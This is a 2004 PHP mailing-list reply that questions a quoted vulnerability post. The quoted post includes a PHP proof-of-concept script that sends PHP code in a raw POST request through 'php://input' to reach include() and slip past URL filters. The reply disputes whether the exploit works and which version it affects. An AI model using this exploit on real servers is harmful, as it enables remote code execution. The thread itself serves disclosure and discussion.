Re: [PHP] include() bypassing filter with php://input
What exactly does your "proof of concept" do? I tried this on my system with
PHP 4.34.x--which, by the way, is when support for php://input began, *not*
3.0.13--and nothing happened whatsoever. Where's the proof?
on 5/27/04 3:07 AM, lostnoobs@xxxxxxxxxxxxxxxxxxxxxx purportedly said:
>
>
> Informations :
> °°°°°°°°°°°°°°
> Website : http://www.php.net
> Version : PHP 3.0.13 =>
> Problem : Inlude() bypassing filter
>
>
> Proof of concept:
> °°°°°°°° Exploit °°°°°°°°°
> <------------ cut here ---------------->
> <form action="" methode="post" >
> target server : <input type="text" name="server" ><br>
> file : <input type="text" name="file" ><br>
> exec : <input type="text" name="cmd" ><br>
> <INPUT type="submit" value="send">
> </form>
>
> <?
> if($cmd){
> $message = "POST /".$file."php://input HTTP/1.1\r\n";
> $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> application/x-shockwave-flash, */*\r\n";
> $message .= "Accept-Language: fr\r\n";
> $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
> $message .= "Accept-Encoding: deflate\r\n";
> $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
> MyIE2)\r\n";
> $message .= "Host: ".$server."\r\n";
> $message .= "Content-length: ".strlen( $cmd )."\r\n";
> $message .= "Connection: Keep-Alive\r\n";
> $message .= "Cache-Control: no-cache\r\n";
> $message .= "\r\n";
> $message .= $cmd."\r\n";
> $fd = fsockopen( $server, 80 );
> fputs($fd,$message);
> while(!feof($fd)) {
> echo fgets($fd,1280);
> }
> fclose($fd);
> }
> ?>
> <------------ cut here ---------------->
>
> target server = "www.exemple.com"
> file = "index.php?page="
> exec = "<? phpinfo(); ?>"
>
> Explaination
> °°°°°°°°°°°°°°
> You can bypassing filter protection who parse http:// or ftp:// ...
> "php://input" allows to put data in the function include() by sending a
> request with code php in POST methode.
>
>
> For More details :
> °°°°°°°°°°°°°°
> http://fr2.php.net/manual/en/wrappers.php.php
> irc.fr.worldnet.net #s-c
>
> Nourredine Himeur
>
> www.security-challenge.com
>
> This vulnerability was found by Slythers but he's too shy for publish the vuln
> ;)
>
> greetz : mum , daddy , tcpteam , Nyx
>
>
>
Keary Suska
Esoteritech, Inc.
"Leveraging Open Source for a better Internet"